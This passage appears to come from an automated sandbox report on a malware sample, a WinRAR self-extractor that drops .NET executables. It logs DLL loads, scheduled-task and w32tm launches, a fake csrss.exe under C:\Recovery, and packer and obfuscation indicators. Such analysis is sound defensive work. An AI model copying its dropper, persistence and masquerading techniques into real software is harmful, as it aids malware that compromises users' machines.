            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: version.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: wldp.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: profapi.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: amsi.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: userenv.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: propsys.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: edputil.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: netutils.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: slc.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: sppc.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: mscoree.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: version.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: uxtheme.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: windows.storage.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: wldp.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: profapi.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: cryptsp.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: rsaenh.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: cryptbase.dll
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeSection loaded: sspicli.dll
            Source: C:\Recovery\csrss.exeSection loaded: mscoree.dll
            Source: C:\Recovery\csrss.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\csrss.exeSection loaded: version.dll
            Source: C:\Recovery\csrss.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\csrss.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\csrss.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\csrss.exeSection loaded: wldp.dll
            Source: C:\Recovery\csrss.exeSection loaded: profapi.dll
            Source: C:\Recovery\csrss.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\csrss.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\csrss.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\csrss.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: CRf9KBk4ra.exeStatic file information: File size 1377924 > 1048576
            Source: CRf9KBk4ra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: CRf9KBk4ra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: CRf9KBk4ra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: CRf9KBk4ra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: CRf9KBk4ra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: CRf9KBk4ra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: CRf9KBk4ra.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: CRf9KBk4ra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CRf9KBk4ra.exe
            Source: CRf9KBk4ra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: CRf9KBk4ra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: CRf9KBk4ra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: CRf9KBk4ra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: CRf9KBk4ra.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, T7OMDiCNENbut1hHnNT.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, T7OMDiCNENbut1hHnNT.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, RR9e4JTYUhHjDeLXG2X.cs.Net Code: roQ7dNIvwJ System.AppDomain.Load(byte[])
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, RR9e4JTYUhHjDeLXG2X.cs.Net Code: roQ7dNIvwJ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, RR9e4JTYUhHjDeLXG2X.cs.Net Code: roQ7dNIvwJ
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, RR9e4JTYUhHjDeLXG2X.cs.Net Code: roQ7dNIvwJ System.AppDomain.Load(byte[])
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, RR9e4JTYUhHjDeLXG2X.cs.Net Code: roQ7dNIvwJ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.CRf9KBk4ra.exe.490b53b.1.raw.unpack, RR9e4JTYUhHjDeLXG2X.cs.Net Code: roQ7dNIvwJ
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeFile created: C:\hyperBrowsermonitorNet\__tmp_rar_sfx_access_check_6718750Jump to behavior
            Source: CRf9KBk4ra.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038E28C push eax; ret 0_2_0038E2AA
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038CAC9 push eax; retf 0038h0_2_0038CACE
            Source: C:\Users\user\Desktop\CRf9KBk4ra.exeCode function: 0_2_0038ED46 push ecx; ret 0_2_0038ED59
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B752BF8 pushad ; retf 4_2_00007FFD9B752C61
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B752C38 pushad ; retf 4_2_00007FFD9B752C61
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B752C48 pushad ; retf 4_2_00007FFD9B752C61
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B752C58 pushad ; retf 4_2_00007FFD9B752C61
            Source: C:\hyperBrowsermonitorNet\serverwinCommon.exeCode function: 4_2_00007FFD9B7500BD pushad ; iretd 4_2_00007FFD9B7500C1
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 19_2_00007FFD9B782BF8 pushad ; retf 19_2_00007FFD9B782C61
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 19_2_00007FFD9B782C38 pushad ; retf 19_2_00007FFD9B782C61
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 19_2_00007FFD9B782C48 pushad ; retf 19_2_00007FFD9B782C61
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 19_2_00007FFD9B782C58 pushad ; retf 19_2_00007FFD9B782C61
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 19_2_00007FFD9B7800BD pushad ; iretd 19_2_00007FFD9B7800C1
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 20_2_00007FFD9B762BE4 pushad ; retf 20_2_00007FFD9B762C61
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 20_2_00007FFD9B7600BD pushad ; iretd 20_2_00007FFD9B7600C1
            Source: C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exeCode function: 20_2_00007FFD9B771EF1 push ss; ret 20_2_00007FFD9B771EF7
            Source: C:\Recovery\csrss.exeCode function: 21_2_00007FFD9B791EF1 push ss; ret 21_2_00007FFD9B791EF7
            Source: C:\Recovery\csrss.exeCode function: 21_2_00007FFD9B782BE4 pushad ; retf 21_2_00007FFD9B782C61
            Source: C:\Recovery\csrss.exeCode function: 21_2_00007FFD9B7800BD pushad ; iretd 21_2_00007FFD9B7800C1
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, gwLLni86I4fUkJCC8k.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'rpbREp5OlW1kpCkUmAc', 'VNHR8D5MoPy1y83sBao', 'kvkDaV5xfWFX2NOgqUL', 'UZyW9q5Wlhf5VjqdXUy', 'V1aDVs5mcLPv5DrxlVg', 'JvqSpW5nWgpjuKtDdm5'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, PcXXiLxN9NJBeh7paC.csHigh entropy of concatenated method names: 'Jh7bltQIt', 'G70LlCwKp', 'Yj2Ilw2Ot', 'UdRUgdpNuurAjMJt80R', 'aVNuNQpdj4MR6ddGFcZ', 'sQ3DFqpGXqdOYJfkhYH', 'QThuwEpw49dfei5JyZG', 'v4QbXuphRV2VdUcbiJ7', 'VUPeNapHi3fRri7v3oa', 'XBCwf9pTETFB99Uf2No'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, RR9e4JTYUhHjDeLXG2X.csHigh entropy of concatenated method names: 'Qq07EIW2qq', 'iOu7vgoaan', 'hBT7bbyyEy', 'xJ57Llhfl1', 'XHv7IaVT7R', 'UKO7YCSHOS', 'Buc7VoGKZJ', 'AKEr04WC6lep1W936iL', 'qEhhGnW7AxV3tjOlmUd', 'yx7DllWgx5OAgmdEwMc'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, eGRsHCT5pyOU6T5aHOc.csHigh entropy of concatenated method names: 'OYuDHC5W9G', 'oVmDF0Zeaj', 'v0npgL8P2HPig3Br45t', 'JuvooO89ldSpPGK1LTo', 'uoPcrf8V6WONi48oIKR', 'Gk2qhW8UZud2RK1xDLX', 'r54DWQ6brV', 'URZaXi1lcXOHLM7yv5P', 'WosfOL1pLfe0uMZAtQt', 'A6kE3p82xWAZdkspfIv'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, O8cgi52Vc1YauhG4nGY.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'Bw4MSBy8vS', '_3il', 'JZcMTldvdt', 'we4MAoLA0n', '_78N', 'z3K'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, anwPjJlS4ogVOjK6GM0.csHigh entropy of concatenated method names: '_269', '_5E7', 'UT2EdTimnF', 'Mz8', 'e3HEZaJ6QC', 'LkajD4g6OHsBqDwPODF', 'XcWcQZgVxTiJeLZflIK', 'Y4TxFrgU2UF61P1fuh5', 'sTDMyggPKwsuTRuFCg8', 'xUdhhWg9NLOiweCt0kP'
            Source: 0.3.CRf9KBk4ra.exe.5fc253b.0.raw.unpack, BR6gRtlgfi8XZMZgAip.csHigh entropy of concatenated method names: '_5u9', 'N1AE6sMgyn', 'rUuKSjhCF6', 'A1oEulKGK6', 'kOwECi7J59NfrXnQAtT', 'GoDVX67s3EMdAhv0doe', 'Q8vBn372jNe1ZGmV5RP', 'Vpn3kc7PNQlDtZM540A', 'xoJxfq79OVu8mKOWSgZ', 'ugWySD7z1DHvUAyW4IA'
